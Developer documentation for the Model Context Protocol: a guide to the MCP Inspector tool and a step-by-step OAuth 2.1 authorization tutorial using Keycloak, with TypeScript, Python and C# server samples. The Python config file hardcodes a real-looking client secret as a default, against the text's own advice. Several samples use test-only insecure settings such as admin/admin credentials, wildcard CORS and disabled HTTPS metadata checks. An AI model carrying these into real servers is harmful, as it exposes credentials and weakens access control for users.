The [MCP Inspector](https://github.com/modelcontextprotocol/inspector) is an interactive developer tool for testing and debugging MCP servers. While the [Debugging Guide](/legacy/tools/debugging) covers the Inspector as part of the overall debugging toolkit, this document provides a detailed exploration of the Inspector's features and capabilities.
## Getting started
### Installation and basic usage
The Inspector runs directly through `npx` without requiring installation:
```bash theme={null}
npx @modelcontextprotocol/inspector
```
```bash theme={null}
npx @modelcontextprotocol/inspector
```
#### Inspecting servers from npm or PyPI
A common way to start server packages from [npm](https://npmjs.com) or [PyPI](https://pypi.org).
```bash theme={null}
npx -y @modelcontextprotocol/inspector npx
# For example
npx -y @modelcontextprotocol/inspector npx @modelcontextprotocol/server-filesystem /Users/username/Desktop
```
```bash theme={null}
npx @modelcontextprotocol/inspector uvx
# For example
npx @modelcontextprotocol/inspector uvx mcp-server-git --repository ~/code/mcp/servers.git
```
#### Inspecting locally developed servers
To inspect servers locally developed or downloaded as a repository, the most common
way is:
```bash theme={null}
npx @modelcontextprotocol/inspector node path/to/server/index.js args...
```
```bash theme={null}
npx @modelcontextprotocol/inspector \
uv \
--directory path/to/server \
run \
package-name \
args...
```
Please carefully read any attached README for the most accurate instructions.
## Feature overview
The Inspector provides several features for interacting with your MCP server:
### Server connection pane
* Allows selecting the [transport](/legacy/concepts/transports) for connecting to the server
* For local servers, supports customizing the command-line arguments and environment
### Resources tab
* Lists all available resources
* Shows resource metadata (MIME types, descriptions)
* Allows resource content inspection
* Supports subscription testing
### Prompts tab
* Displays available prompt templates
* Shows prompt arguments and descriptions
* Enables prompt testing with custom arguments
* Previews generated messages
### Tools tab
* Lists available tools
* Shows tool schemas and descriptions
* Enables tool testing with custom inputs
* Displays tool execution results
### Notifications pane
* Presents all logs recorded from the server
* Shows notifications received from the server
## Best practices
### Development workflow
1. Start Development
* Launch Inspector with your server
* Verify basic connectivity
* Check capability negotiation
2. Iterative testing
* Make server changes
* Rebuild the server
* Reconnect the Inspector
* Test affected features
* Monitor messages
3. Test edge cases
* Invalid inputs
* Missing prompt arguments
* Concurrent operations
* Verify error handling and error responses
## Next steps
Check out the MCP Inspector source code
Learn about broader debugging strategies
# Understanding Authorization in MCP
Source: https://modelcontextprotocol.io/docs/tutorials/security/authorization
Learn how to implement secure authorization for MCP servers using OAuth 2.1 to protect sensitive resources and operations
Authorization in the Model Context Protocol (MCP) secures access to sensitive resources and operations exposed by MCP servers. If your MCP server handles user data or administrative actions, authorization ensures only permitted users can access its endpoints.
MCP uses standardized authorization flows to build trust between MCP clients and MCP servers. Its design doesn't focus on one specific authorization or identity system, but rather follows the conventions outlined for [OAuth 2.1](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13). For detailed information, see the [Authorization specification](/specification/latest/basic/authorization).
## When Should You Use Authorization?
While authorization for MCP servers is **optional**, it is strongly recommended when:
* Your server accesses user-specific data (emails, documents, databases)
* You need to audit who performed which actions
* Your server grants access to its APIs that require user consent
* You're building for enterprise environments with strict access controls
* You want to implement rate limiting or usage tracking per user
**Authorization for Local MCP Servers**
For MCP servers using the [STDIO transport](/specification/latest/basic/transports#stdio), you can use environment-based credentials or credentials provided by third-party libraries embedded directly in the MCP server instead. Because a STDIO-built MCP server runs locally, it has access to a range of flexible options when it comes to acquiring user credentials that may or may not rely on in-browser authentication and authorization flows.
OAuth flows, in turn, are designed for HTTP-based transports where the MCP server is remotely-hosted and the client uses OAuth to establish that a user is authorized to access said remote server.
## The Authorization Flow: Step by Step
Let's walk through what happens when a client wants to connect to your protected MCP server:
When your MCP client first tries to connect, your server responds with a `401 Unauthorized` and tells the client where to find authorization information, captured in a [Protected Resource Metadata (PRM) document](https://datatracker.ietf.org/doc/html/rfc9728). The document is hosted by the MCP server, follows a predictable path pattern, and is provided to the client in the `resource_metadata` parameter within the `WWW-Authenticate` header.
```http theme={null}
HTTP/1.1 401 Unauthorized
WWW-Authenticate: Bearer realm="mcp",
resource_metadata="https://your-server.com/.well-known/oauth-protected-resource"
```
This tells the client that authorization is required for the MCP server and where to get the necessary information to kickstart the authorization flow.
With the URI pointer to the PRM document, the client will fetch the metadata to learn about the authorization server, supported scopes, and other resource information. The data is typically encapsulated in a JSON blob, similar to the one below.
```json theme={null}
{
"resource": "https://your-server.com/mcp",
"authorization_servers": ["https://auth.your-server.com"],
"scopes_supported": ["mcp:tools", "mcp:resources"]
}
```
You can see a more comprehensive example in [RFC 9728 Section 3.2](https://datatracker.ietf.org/doc/html/rfc9728#name-protected-resource-metadata-r).
Next, the client discovers what the authorization server can do by fetching its metadata. If the PRM document lists more than one authorization server, the client can decide which one to use.
With an authorization server selected, the client will then construct a standard metadata URI and issue a request to the [OpenID Connect (OIDC) Discovery](https://openid.net/specs/openid-connect-discovery-1_0.html) or [OAuth 2.0 Auth Server Metadata](https://datatracker.ietf.org/doc/html/rfc8414) endpoints (depending on authorization server support)
and retrieve another set of metadata properties that will allow it to know the endpoints it needs to complete the authorization flow.
```json theme={null}
{
"issuer": "https://auth.your-server.com",
"authorization_endpoint": "https://auth.your-server.com/authorize",
"token_endpoint": "https://auth.your-server.com/token",
"registration_endpoint": "https://auth.your-server.com/register"
}
```
With all the metadata out of the way, the client now needs to make sure that it's registered with the authorization server. This can be done in two ways.
First, the client can be **pre-registered** with a given authorization server, in which case it can have embedded client registration information that it uses to complete the authorization flow.
Alternatively, the client can use **Dynamic Client Registration** (DCR) to dynamically register itself with the authorization server. The latter scenario requires the authorization server to support DCR. If the authorization server does support DCR, the client will send a request to the `registration_endpoint` with its information:
```json theme={null}
{
"client_name": "My MCP Client",
"redirect_uris": ["http://localhost:3000/callback"],
"grant_types": ["authorization_code", "refresh_token"],
"response_types": ["code"]
}
```
If the registration succeeds, the authorization server will return a JSON blob with client registration information.
**No DCR or Pre-Registration**
In case an MCP client connects to an MCP server that doesn't use an authorization server that supports DCR and the client is not pre-registered with said authorization server, it's the responsibility of the client developer to provide an affordance for the end-user to enter client information manually.
The client will now need to open a browser to the `/authorize` endpoint, where the user can log in and grant the required permissions. The authorization server will then redirect back to the client with an authorization code that the client exchanges for tokens:
```json theme={null}
{
"access_token": "eyJhbGciOiJSUzI1NiIs...",
"refresh_token": "def502...",
"token_type": "Bearer",
"expires_in": 3600
}
```
The access token is what the client will use to authenticate requests to the MCP server. This step follows standard [OAuth 2.1 authorization code with PKCE](https://oauth.net/2/grant-types/authorization-code/) conventions.
Finally, the client can make requests to your MCP server using the access token embedded in the `Authorization` header:
```http theme={null}
GET /mcp HTTP/1.1
Host: your-server.com
Authorization: Bearer eyJhbGciOiJSUzI1NiIs...
```
The MCP server will need to validate the token and process the request if the token is valid and has the required permissions.
## Implementation Example
To get started with a practical implementation, we will use a [Keycloak](https://www.keycloak.org/) authorization server hosted in a Docker container. Keycloak is an open-source authorization server that can be easily deployed locally for testing and experimentation.
Make sure that you download and install [Docker Desktop](https://www.docker.com/products/docker-desktop/). We will need it to deploy Keycloak on our development machine.
### Keycloak Setup
From your terminal application, run the following command to start the Keycloak container:
```bash theme={null}
docker run -p 127.0.0.1:8080:8080 -e KC_BOOTSTRAP_ADMIN_USERNAME=admin -e KC_BOOTSTRAP_ADMIN_PASSWORD=admin quay.io/keycloak/keycloak start-dev
```
This command will pull the Keycloak container image locally and bootstrap the basic configuration. It will run on port `8080` and have an `admin` user with `admin` password.
**Not for Production**
The configuration above may be suitable for testing and experimentation; however, you should never use it in production. Refer to the [Configuring Keycloak for production](https://www.keycloak.org/server/configuration-production) guide for additional details on how to deploy the authorization server for scenarios that require reliability, security, and high availability.
You will be able to access the Keycloak authorization server from your browser at `http://localhost:8080`.
When running with the default configuration, Keycloak will already support many of the capabilities that we need for MCP servers, including Dynamic Client Registration. You can check this by looking at the OIDC configuration, available at:
```http theme={null}
http://localhost:8080/realms/master/.well-known/openid-configuration
```
We will also need to set up Keycloak to support our scopes and allow our host (local machine) to dynamically register clients, as the default policies restrict anonymous dynamic client registration.
Go to **Client scopes** in the Keycloak dashboard and create a new `mcp:tools` scope. We will use this to access all of the tools on our MCP server.
After creating the scope, make sure that you assign its type to **Default** and have flipped the **Include in token scope** switch, as this will be needed for token validation.
Let's now also set up an **audience** for our Keycloak-issued tokens. An audience is important to configure because it embeds the intended destination directly into the issued access token. This helps your MCP server to verify that the token it got was actually meant for it rather than some other API. This is key to help avoid token passthrough scenarios.
To do this, open your `mcp:tools` client scope and click on **Mappers**, followed by **Configure a new mapper**. Select **Audience**.
For **Name**, use `audience-config`. Add a value for **Included Custom Audience**, set to `http://localhost:3000`. This will be the URI of our test server.
**Not for Production**
The audience configuration above is meant for testing. For production scenarios, additional set-up and configuration will be required to ensure that audiences are properly constrained for issued tokens. Specifically, the audience needs to be based on the resource parameter passed from the client, not a fixed value.
Now, navigate to **Clients**, then **Client registration**, and then **Trusted Hosts**. Disable the **Client URIs Must Match** setting and add the hosts from which you're testing. You can get your current host IP by running the `ifconfig` command on Linux or macOS, or `ipconfig` on Windows. You can see the IP address you need to add by looking at the keycloak logs for a line that looks like `Failed to verify remote host : 192.168.215.1`. Check that the IP address is associated with your host. This may be for a bridge network depending on your docker setup.
**Getting the Host**
If you are running Keycloak from a container, you will also be able to see the host IP from the Terminal in the container logs.
Lastly, we need to register a new client that we can use with the **MCP server itself** to talk to Keycloak for things like [token introspection](https://oauth.net/2/token-introspection/). To do that:
1. Go to **Clients**.
2. Click **Create client**.
3. Give your client a unique **Client ID** and click **Next**.
4. Enable **Client authentication** and click **Next**.
5. Click **Save**.
Worth noting that token introspection is just *one of* the available approaches to validate tokens. This can also be done with the help of standalone libraries, specific to each language and platform.
When you open the client details, go to **Credentials** and take note of the **Client Secret**.
**Handling Secrets**
Never embed client credentials directly in your code. We recommend using environment variables or specialized solutions for secret storage.
With Keycloak configured, every time the authorization flow is triggered, your MCP server will receive a token like this:
```text theme={null}
eyJhbGciOiJSUzI1NiIsInR5cCIgOiAiSldUIiwia2lkIiA6ICI1TjcxMGw1WW5MWk13WGZ1VlJKWGtCS3ZZMzZzb3JnRG5scmlyZ2tlTHlzIn0.eyJleHAiOjE3NTU1NDA4MTcsImlhdCI6MTc1NTU0MDc1NywiYXV0aF90aW1lIjoxNzU1NTM4ODg4LCJqdGkiOiJvbnJ0YWM6YjM0MDgwZmYtODQwNC02ODY3LTgxYmUtMTIzMWI1MDU5M2E4IiwiaXNzIjoiaHR0cDovL2xvY2FsaG9zdDo4MDgwL3JlYWxtcy9tYXN0ZXIiLCJhdWQiOiJodHRwOi8vbG9jYWxob3N0OjMwMDAiLCJzdWIiOiIzM2VkNmM2Yi1jNmUwLTQ5MjgtYTE2MS1mMmY2OWM3YTAzYjkiLCJ0eXAiOiJCZWFyZXIiLCJhenAiOiI3OTc1YTViNi04YjU5LTRhODUtOWNiYS04ZmFlYmRhYjg5NzQiLCJzaWQiOiI4ZjdlYzI3Ni0zNThmLTRjY2MtYjMxMy1kYjA4MjkwZjM3NmYiLCJzY29wZSI6Im1jcDp0b29scyJ9.P5xCRtXORly0R0EXjyqRCUx-z3J4uAOWNAvYtLPXroykZuVCCJ-K1haiQSwbURqfsVOMbL7jiV-sD6miuPzI1tmKOkN_Yct0Vp-azvj7U5rEj7U6tvPfMkg2Uj_jrIX0KOskyU2pVvGZ-5BgqaSvwTEdsGu_V3_E0xDuSBq2uj_wmhqiyTFm5lJ1WkM3Hnxxx1_AAnTj7iOKMFZ4VCwMmk8hhSC7clnDauORc0sutxiJuYUZzxNiNPkmNeQtMCGqWdP1igcbWbrfnNXhJ6NswBOuRbh97_QraET3hl-CNmyS6C72Xc0aOwR_uJ7xVSBTD02OaQ1JA6kjCATz30kGYg
```
Decoded, it will look like this:
```json theme={null}
{
"alg": "RS256",
"typ": "JWT",
"kid": "5N710l5YnLZMwXfuVRJXkBKvY36sorgDnlrirgkeLys"
}.{
"exp": 1755540817,
"iat": 1755540757,
"auth_time": 1755538888,
"jti": "onrtac:b34080ff-8404-6867-81be-1231b50593a8",
"iss": "http://localhost:8080/realms/master",
"aud": "http://localhost:3000",
"sub": "33ed6c6b-c6e0-4928-a161-f2f69c7a03b9",
"typ": "Bearer",
"azp": "7975a5b6-8b59-4a85-9cba-8faebdab8974",
"sid": "8f7ec276-358f-4ccc-b313-db08290f376f",
"scope": "mcp:tools"
}.[Signature]
```
**Embedded Audience**
Notice the `aud` claim embedded in the token - it's currently set to be the URI of the test MCP server and it's inferred from the scope that we've previously configured. This will be important in our implementation to validate.
### MCP Server Setup
We will now set up our MCP server to use the locally-running Keycloak authorization server. Depending on your programming language preference, you can use one of the supported [MCP SDKs](/docs/sdk).
For our testing purposes, we will create an extremely simple MCP server that exposes two tools - one for addition and another for multiplication. The server will require authorization to access these.
You can see the complete TypeScript project in the [sample repository](https://github.com/localden/min-ts-mcp-auth).
Prior to running the code below, ensure that you have a `.env` file with the following content:
```env theme={null}
# Server host/port
HOST=localhost
PORT=3000
# Auth server location
AUTH_HOST=localhost
AUTH_PORT=8080
AUTH_REALM=master
# Keycloak OAuth client credentials
OAUTH_CLIENT_ID=
OAUTH_CLIENT_SECRET=
```
`OAUTH_CLIENT_ID` and `OAUTH_CLIENT_SECRET` are associated with the MCP server client we created earlier.
In addition to implementing the MCP authorization specification, the server below also does token introspection via Keycloak to make sure that the token it receives from the client is valid. It also implements basic logging to allow you to easily diagnose any issues.
```typescript theme={null}
import "dotenv/config";
import express from "express";
import { randomUUID } from "node:crypto";
import { McpServer } from "@modelcontextprotocol/sdk/server/mcp.js";
import { StreamableHTTPServerTransport } from "@modelcontextprotocol/sdk/server/streamableHttp.js";
import { isInitializeRequest } from "@modelcontextprotocol/sdk/types.js";
import { z } from "zod";
import cors from "cors";
import {
mcpAuthMetadataRouter,
getOAuthProtectedResourceMetadataUrl,
} from "@modelcontextprotocol/sdk/server/auth/router.js";
import { requireBearerAuth } from "@modelcontextprotocol/sdk/server/auth/middleware/bearerAuth.js";
import { OAuthMetadata } from "@modelcontextprotocol/sdk/shared/auth.js";
import { checkResourceAllowed } from "@modelcontextprotocol/sdk/shared/auth-utils.js";
const CONFIG = {
host: process.env.HOST || "localhost",
port: Number(process.env.PORT) || 3000,
auth: {
host: process.env.AUTH_HOST || process.env.HOST || "localhost",
port: Number(process.env.AUTH_PORT) || 8080,
realm: process.env.AUTH_REALM || "master",
clientId: process.env.OAUTH_CLIENT_ID || "mcp-server",
clientSecret: process.env.OAUTH_CLIENT_SECRET || "",
},
};
function createOAuthUrls() {
const authBaseUrl = new URL(
`http://${CONFIG.auth.host}:${CONFIG.auth.port}/realms/${CONFIG.auth.realm}/`,
);
return {
issuer: authBaseUrl.toString(),
introspection_endpoint: new URL(
"protocol/openid-connect/token/introspect",
authBaseUrl,
).toString(),
authorization_endpoint: new URL(
"protocol/openid-connect/auth",
authBaseUrl,
).toString(),
token_endpoint: new URL(
"protocol/openid-connect/token",
authBaseUrl,
).toString(),
};
}
function createRequestLogger() {
return (req: any, res: any, next: any) => {
const start = Date.now();
res.on("finish", () => {
const ms = Date.now() - start;
console.log(
`${req.method} ${req.originalUrl} -> ${res.statusCode} ${ms}ms`,
);
});
next();
};
}
const app = express();
app.use(
express.json({
verify: (req: any, _res, buf) => {
req.rawBody = buf?.toString() ?? "";
},
}),
);
app.use(
cors({
origin: "*",
exposedHeaders: ["Mcp-Session-Id"],
}),
);
app.use(createRequestLogger());
const mcpServerUrl = new URL(`http://${CONFIG.host}:${CONFIG.port}`);
const oauthUrls = createOAuthUrls();
const oauthMetadata: OAuthMetadata = {
...oauthUrls,
response_types_supported: ["code"],
};
const tokenVerifier = {
verifyAccessToken: async (token: string) => {
const endpoint = oauthMetadata.introspection_endpoint;
if (!endpoint) {
console.error("[auth] no introspection endpoint in metadata");
throw new Error("No token verification endpoint available in metadata");
}
const params = new URLSearchParams({
token: token,
client_id: CONFIG.auth.clientId,
});
if (CONFIG.auth.clientSecret) {
params.set("client_secret", CONFIG.auth.clientSecret);
}
let response: Response;
try {
response = await fetch(endpoint, {
method: "POST",
headers: {
"Content-Type": "application/x-www-form-urlencoded",
},
body: params.toString(),
});
} catch (e) {
console.error("[auth] introspection fetch threw", e);
throw e;
}
if (!response.ok) {
const txt = await response.text();
console.error("[auth] introspection non-OK", { status: response.status });
try {
const obj = JSON.parse(txt);
console.log(JSON.stringify(obj, null, 2));
} catch {
console.error(txt);
}
throw new Error(`Invalid or expired token: ${txt}`);
}
let data: any;
try {
data = await response.json();
} catch (e) {
const txt = await response.text();
console.error("[auth] failed to parse introspection JSON", {
error: String(e),
body: txt,
});
throw e;
}
if (data.active === false) {
throw new Error("Inactive token");
}
if (!data.aud) {
throw new Error("Resource indicator (aud) missing");
}
const audiences: string[] = Array.isArray(data.aud) ? data.aud : [data.aud];
const allowed = audiences.some((a) =>
checkResourceAllowed({
requestedResource: a,
configuredResource: mcpServerUrl,
}),
);
if (!allowed) {
throw new Error(
`None of the provided audiences are allowed. Expected ${mcpServerUrl}, got: ${audiences.join(", ")}`,
);
}
return {
token,
clientId: data.client_id,
scopes: data.scope ? data.scope.split(" ") : [],
expiresAt: data.exp,
};
},
};
app.use(
mcpAuthMetadataRouter({
oauthMetadata,
resourceServerUrl: mcpServerUrl,
scopesSupported: ["mcp:tools"],
resourceName: "MCP Demo Server",
}),
);
const authMiddleware = requireBearerAuth({
verifier: tokenVerifier,
requiredScopes: [],
resourceMetadataUrl: getOAuthProtectedResourceMetadataUrl(mcpServerUrl),
});
const transports: { [sessionId: string]: StreamableHTTPServerTransport } = {};
function createMcpServer() {
const server = new McpServer({
name: "example-server",
version: "1.0.0",
});
server.registerTool(
"add",
{
title: "Addition Tool",
description: "Add two numbers together",
inputSchema: {
a: z.number().describe("First number to add"),
b: z.number().describe("Second number to add"),
},
},
async ({ a, b }) => ({
content: [{ type: "text", text: `${a} + ${b} = ${a + b}` }],
}),
);
server.registerTool(
"multiply",
{
title: "Multiplication Tool",
description: "Multiply two numbers together",
inputSchema: {
x: z.number().describe("First number to multiply"),
y: z.number().describe("Second number to multiply"),
},
},
async ({ x, y }) => ({
content: [{ type: "text", text: `${x} × ${y} = ${x * y}` }],
}),
);
return server;
}
const mcpPostHandler = async (req: express.Request, res: express.Response) => {
const sessionId = req.headers["mcp-session-id"] as string | undefined;
let transport: StreamableHTTPServerTransport;
if (sessionId && transports[sessionId]) {
transport = transports[sessionId];
} else if (!sessionId && isInitializeRequest(req.body)) {
transport = new StreamableHTTPServerTransport({
sessionIdGenerator: () => randomUUID(),
onsessioninitialized: (sessionId) => {
transports[sessionId] = transport;
},
});
transport.onclose = () => {
if (transport.sessionId) {
delete transports[transport.sessionId];
}
};
const server = createMcpServer();
await server.connect(transport);
} else {
res.status(400).json({
jsonrpc: "2.0",
error: {
code: -32000,
message: "Bad Request: No valid session ID provided",
},
id: null,
});
return;
}
await transport.handleRequest(req, res, req.body);
};
const handleSessionRequest = async (
req: express.Request,
res: express.Response,
) => {
const sessionId = req.headers["mcp-session-id"] as string | undefined;
if (!sessionId || !transports[sessionId]) {
res.status(400).send("Invalid or missing session ID");
return;
}
const transport = transports[sessionId];
await transport.handleRequest(req, res);
};
app.post("/", authMiddleware, mcpPostHandler);
app.get("/", authMiddleware, handleSessionRequest);
app.delete("/", authMiddleware, handleSessionRequest);
app.listen(CONFIG.port, CONFIG.host, () => {
console.log(`🚀 MCP Server running on ${mcpServerUrl.origin}`);
console.log(`📡 MCP endpoint available at ${mcpServerUrl.origin}`);
console.log(
`🔐 OAuth metadata available at ${getOAuthProtectedResourceMetadataUrl(mcpServerUrl)}`,
);
});
```
When you run the server, you can add it to your MCP client, such as Visual Studio Code, by providing the MCP server endpoint.
For more details about implementing MCP servers in TypeScript, refer to the [TypeScript SDK documentation](https://github.com/modelcontextprotocol/typescript-sdk).
You can see the complete Python project in the [sample repository](https://github.com/localden/min-py-mcp-auth).
To simplify our authorization interaction, in Python scenarios we rely on [FastMCP](https://gofastmcp.com/getting-started/welcome). A lot of the conventions around authorization, like the endpoints and token validation logic, are consistent across languages, but some offer simpler ways in integrating them in production scenarios.
Prior to writing the actual server, we need to set up our configuration in `config.py` - the contents are entirely based on your local server setup:
```python theme={null}
"""Configuration settings for the MCP auth server."""
import os
from typing import Optional
class Config:
"""Configuration class that loads from environment variables with sensible defaults."""
# Server settings
HOST: str = os.getenv("HOST", "localhost")
PORT: int = int(os.getenv("PORT", "3000"))
# Auth server settings
AUTH_HOST: str = os.getenv("AUTH_HOST", "localhost")
AUTH_PORT: int = int(os.getenv("AUTH_PORT", "8080"))
AUTH_REALM: str = os.getenv("AUTH_REALM", "master")
# OAuth client settings
OAUTH_CLIENT_ID: str = os.getenv("OAUTH_CLIENT_ID", "mcp-server")
OAUTH_CLIENT_SECRET: str = os.getenv("OAUTH_CLIENT_SECRET", "UO3rmozkFFkXr0QxPTkzZ0LMXDidIikB")
# Server settings
MCP_SCOPE: str = os.getenv("MCP_SCOPE", "mcp:tools")
OAUTH_STRICT: bool = os.getenv("OAUTH_STRICT", "false").lower() in ("true", "1", "yes")
TRANSPORT: str = os.getenv("TRANSPORT", "streamable-http")
@property
def server_url(self) -> str:
"""Build the server URL."""
return f"http://{self.HOST}:{self.PORT}"
@property
def auth_base_url(self) -> str:
"""Build the auth server base URL."""
return f"http://{self.AUTH_HOST}:{self.AUTH_PORT}/realms/{self.AUTH_REALM}/"
def validate(self) -> None:
"""Validate configuration."""
if self.TRANSPORT not in ["sse", "streamable-http"]:
raise ValueError(f"Invalid transport: {self.TRANSPORT}. Must be 'sse' or 'streamable-http'")
# Global configuration instance
config = Config()
```
The server implementation is as follows:
```python theme={null}
import datetime
import logging
from typing import Any
from pydantic import AnyHttpUrl
from mcp.server.auth.settings import AuthSettings
from mcp.server.fastmcp.server import FastMCP
from .config import config
from .token_verifier import IntrospectionTokenVerifier
logger = logging.getLogger(__name__)
def create_oauth_urls() -> dict[str, str]:
"""Create OAuth URLs based on configuration (Keycloak-style)."""
from urllib.parse import urljoin
auth_base_url = config.auth_base_url
return {
"issuer": auth_base_url,
"introspection_endpoint": urljoin(auth_base_url, "protocol/openid-connect/token/introspect"),
"authorization_endpoint": urljoin(auth_base_url, "protocol/openid-connect/auth"),
"token_endpoint": urljoin(auth_base_url, "protocol/openid-connect/token"),
}
def create_server() -> FastMCP:
"""Create and configure the FastMCP server."""
config.validate()
oauth_urls = create_oauth_urls()
token_verifier = IntrospectionTokenVerifier(
introspection_endpoint=oauth_urls["introspection_endpoint"],
server_url=config.server_url,
client_id=config.OAUTH_CLIENT_ID,
client_secret=config.OAUTH_CLIENT_SECRET,
)
app = FastMCP(
name="MCP Resource Server",
instructions="Resource Server that validates tokens via Authorization Server introspection",
host=config.HOST,
port=config.PORT,
debug=True,
streamable_http_path="/",
token_verifier=token_verifier,
auth=AuthSettings(
issuer_url=AnyHttpUrl(oauth_urls["issuer"]),
required_scopes=[config.MCP_SCOPE],
resource_server_url=AnyHttpUrl(config.server_url),
),
)
@app.tool()
async def add_numbers(a: float, b: float) -> dict[str, Any]:
"""
Add two numbers together.
This tool demonstrates basic arithmetic operations with OAuth authentication.
Args:
a: The first number to add
b: The second number to add
"""
result = a + b
return {
"operation": "addition",
"operand_a": a,
"operand_b": b,
"result": result,
"timestamp": datetime.datetime.now().isoformat()
}
@app.tool()
async def multiply_numbers(x: float, y: float) -> dict[str, Any]:
"""
Multiply two numbers together.
This tool demonstrates basic arithmetic operations with OAuth authentication.
Args:
x: The first number to multiply
y: The second number to multiply
"""
result = x * y
return {
"operation": "multiplication",
"operand_x": x,
"operand_y": y,
"result": result,
"timestamp": datetime.datetime.now().isoformat()
}
return app
def main() -> int:
"""
Run the MCP Resource Server.
This server:
- Provides RFC 9728 Protected Resource Metadata
- Validates tokens via Authorization Server introspection
- Serves MCP tools requiring authentication
Configuration is loaded from config.py and environment variables.
"""
logging.basicConfig(level=logging.INFO)
try:
config.validate()
oauth_urls = create_oauth_urls()
except ValueError as e:
logger.error("Configuration error: %s", e)
return 1
try:
mcp_server = create_server()
logger.info("Starting MCP Server on %s:%s", config.HOST, config.PORT)
logger.info("Authorization Server: %s", oauth_urls["issuer"])
logger.info("Transport: %s", config.TRANSPORT)
mcp_server.run(transport=config.TRANSPORT)
return 0
except Exception:
logger.exception("Server error")
return 1
if __name__ == "__main__":
exit(main())
```
Lastly, the token verification logic is delegated entirely to `token_verifier.py`, ensuring that we can use the Keycloak introspection endpoint to verify the validity of any credential artifacts
```python theme={null}
"""Token verifier implementation using OAuth 2.0 Token Introspection (RFC 7662)."""
import logging
from typing import Any
from mcp.server.auth.provider import AccessToken, TokenVerifier
from mcp.shared.auth_utils import check_resource_allowed, resource_url_from_server_url
logger = logging.getLogger(__name__)
class IntrospectionTokenVerifier(TokenVerifier):
"""Token verifier that uses OAuth 2.0 Token Introspection (RFC 7662).
"""
def __init__(
self,
introspection_endpoint: str,
server_url: str,
client_id: str,
client_secret: str,
):
self.introspection_endpoint = introspection_endpoint
self.server_url = server_url
self.client_id = client_id
self.client_secret = client_secret
self.resource_url = resource_url_from_server_url(server_url)
async def verify_token(self, token: str) -> AccessToken | None:
"""Verify token via introspection endpoint."""
import httpx
if not self.introspection_endpoint.startswith(("https://", "http://localhost", "http://127.0.0.1")):
return None
timeout = httpx.Timeout(10.0, connect=5.0)
limits = httpx.Limits(max_connections=10, max_keepalive_connections=5)
async with httpx.AsyncClient(
timeout=timeout,
limits=limits,
verify=True,
) as client:
try:
form_data = {
"token": token,
"client_id": self.client_id,
"client_secret": self.client_secret,
}
headers = {"Content-Type": "application/x-www-form-urlencoded"}
response = await client.post(
self.introspection_endpoint,
data=form_data,
headers=headers,
)
if response.status_code != 200:
return None
data = response.json()
if not data.get("active", False):
return None
if not self._validate_resource(data):
return None
return AccessToken(
token=token,
client_id=data.get("client_id", "unknown"),
scopes=data.get("scope", "").split() if data.get("scope") else [],
expires_at=data.get("exp"),
resource=data.get("aud"), # Include resource in token
)
except Exception as e:
return None
def _validate_resource(self, token_data: dict[str, Any]) -> bool:
"""Validate token was issued for this resource server.
Rules:
- Reject if 'aud' missing.
- Accept if any audience entry matches the derived resource URL.
- Supports string or list forms per JWT spec.
"""
if not self.server_url or not self.resource_url:
return False
aud: list[str] | str | None = token_data.get("aud")
if isinstance(aud, list):
return any(self._is_valid_resource(a) for a in aud)
if isinstance(aud, str):
return self._is_valid_resource(aud)
return False
def _is_valid_resource(self, resource: str) -> bool:
"""Check if the given resource matches our server."""
return check_resource_allowed(self.resource_url, resource)
```
For more details, see the [Python SDK documentation](https://github.com/modelcontextprotocol/python-sdk).
You can see the complete C# project in the [sample repository](https://github.com/localden/min-cs-mcp-auth).
To set up authorization in your MCP server using the MCP C# SDK, you can lean on the standard ASP.NET Core builder pattern. Instead of using the introspection endpoint provided by Keycloak, we will use built-in ASP.NET Core capabilities for token validation.
```csharp theme={null}
using Microsoft.AspNetCore.Authentication.JwtBearer;
using Microsoft.IdentityModel.Tokens;
using ModelContextProtocol.AspNetCore.Authentication;
using ProtectedMcpServer.Tools;
using System.Security.Claims;
var builder = WebApplication.CreateBuilder(args);
var serverUrl = "http://localhost:3000/";
var authorizationServerUrl = "http://localhost:8080/realms/master/";
builder.Services.AddAuthentication(options =>
{
options.DefaultChallengeScheme = McpAuthenticationDefaults.AuthenticationScheme;
options.DefaultAuthenticateScheme = JwtBearerDefaults.AuthenticationScheme;
})
.AddJwtBearer(options =>
{
options.Authority = authorizationServerUrl;
var normalizedServerAudience = serverUrl.TrimEnd('/');
options.TokenValidationParameters = new TokenValidationParameters
{
ValidIssuer = authorizationServerUrl,
ValidAudiences = new[] { normalizedServerAudience, serverUrl },
AudienceValidator = (audiences, securityToken, validationParameters) =>
{
if (audiences == null) return false;
foreach (var aud in audiences)
{
if (string.Equals(aud.TrimEnd('/'), normalizedServerAudience, StringComparison.OrdinalIgnoreCase))
{
return true;
}
}
return false;
}
};
options.RequireHttpsMetadata = false; // Set to true in production
options.Events = new JwtBearerEvents
{
OnTokenValidated = context =>
{
var name = context.Principal?.Identity?.Name ?? "unknown";
var email = context.Principal?.FindFirstValue("preferred_username") ?? "unknown";
Console.WriteLine($"Token validated for: {name} ({email})");
return Task.CompletedTask;
},
OnAuthenticationFailed = context =>
{
Console.WriteLine($"Authentication failed: {context.Exception.Message}");
return Task.CompletedTask;
},
};
})
.AddMcp(options =>
{
options.ResourceMetadata = new()
{
Resource = new Uri(serverUrl),
ResourceDocumentation = new Uri("https://docs.example.com/api/math"),
AuthorizationServers = { new Uri(authorizationServerUrl) },
ScopesSupported = ["mcp:tools"]
};
});
builder.Services.AddAuthorization();
builder.Services.AddHttpContextAccessor();
builder.Services.AddMcpServer()
.WithTools()
.WithHttpTransport();
var app = builder.Build();
app.UseAuthentication();
app.UseAuthorization();
app.MapMcp().RequireAuthorization();
Console.WriteLine($"Starting MCP server with authorization at {serverUrl}");
Console.WriteLine($"Using Keycloak server at {authorizationServerUrl}");
Console.WriteLine($"Protected Resource Metadata URL: {serverUrl}.well-known/oauth-protected-resource");
Console.WriteLine("Exposed Math tools: Add, Multiply");
Console.WriteLine("Press Ctrl+C to stop the server");
app.Run(serverUrl);
```
For more details, see the [C# SDK documentation](https://github.com/modelcontextprotocol/csharp-sdk).
## Testing the MCP Server
For testing purposes, we will be using [Visual Studio Code](https://code.visualstudio.com), but any client that supports MCP and the new authorization specification will fit.
Press Cmd + Shift + P and select **MCP: Add server...**. Select **HTTP** and enter `http://localhost:3000`. Give the server a unique name to be used inside Visual Studio Code. In `mcp.json` you should now see an entry like this:
```json theme={null}
"my-mcp-server-18676652": {
"url": "http://localhost:3000",
"type": "http"
}
```
On connection, you will be taken to the browser, where you will be prompted to consent to Visual Studio Code having access to the `mcp:tools` scope.
After consenting, you will see the tools listed right above the server entry in `mcp.json`.
